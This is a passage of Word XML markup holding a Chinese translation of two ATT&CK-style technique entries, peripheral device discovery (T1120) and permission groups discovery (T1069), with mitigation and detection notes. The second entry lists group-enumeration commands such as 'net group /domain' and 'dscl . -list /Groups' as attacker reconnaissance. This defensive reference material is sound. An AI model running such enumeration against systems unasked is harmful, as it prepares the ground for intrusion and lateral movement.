        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="689F46A9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="183D70D7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D72A3E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D72A3E">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D72A3E">
              <w:t xml:space="preserve"> T1120</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="081EA04E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D72A3E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00D72A3E">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D72A3E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19F88CA8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D72A3E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D72A3E">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D72A3E">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F38C4F9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D72A3E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D72A3E">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D72A3E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00D72A3E">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D72A3E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00D72A3E">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D72A3E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FE96A48" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0065761D" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D72A3E">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D72A3E">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4166C0FF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E06DD4A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00F372A5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能试图收集有关连接到计算机系统的附加外围设备和组件的信息。该信息可用于增强他们对系统和网络环境的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认识</w:t>
      </w:r>
      <w:r w:rsidRPr="00F372A5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者可用于进一步的动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086433E2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072709F8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00D75F37">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于滥用系统功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB630A7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B757467" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00D250C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当攻击者学习环境时，系统和网络发现技术通常在整个操作中发生。不应孤立地查看数据和事件，而应将其视为可能导致基于所获信息的其他活动的行为链的一部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FF3F1A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="00D250C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于收集系统和网络信息的操作的进程和命令行参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行监视。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D250C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具有内置功能的远程访问工具可以直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D250C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r w:rsidRPr="00D250C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互以收集信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00B063B5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B063B5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="003711D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62249E50" w14:textId="0311EF96" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00F95000" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>权限组</w:t>
      </w:r>
      <w:r w:rsidR="00A0413E" w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007526C7" w14:paraId="4727D90D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31DA430C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>T1069</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D4AF0FD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F0BD447" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63DB94BD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E5F48B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05E36931" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId177" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="007526C7">
                <w:t>CAPEC-576</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="007526C7">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00473779" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EBE9520" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00832F39" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506BC6D7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试查找本地系统或域级别的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>群</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组和权限设置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B7F441" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19224CC3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可以列出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>群</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>组的示例命令包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>实用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net group /domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net localgroup</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E7A4F0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AF6BB1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Mac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>系统中</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> dscacheutil -q group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>命令可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>来列出域级别群组，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> dscl . -list /Groups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>命令可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>列出本地群组</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC363B4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED4DAB6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> groups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令可用</w:t>
      </w:r>
      <w:r>
        <w:t>来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>枚举</w:t>
      </w:r>
      <w:r>
        <w:t>本地群组，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> ldapsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用来枚举</w:t>
      </w:r>
      <w:r>
        <w:t>域级别群组</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D76EBA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BFC417" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D27D32" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A19D502" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者试图</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>了解环境的整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27200">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>例如横向移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0D92A7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00832F39" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程和命令行参数来查看是否有收集</w:t>
      </w:r>
      <w:r>
        <w:t>系统和网络信息的行为。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
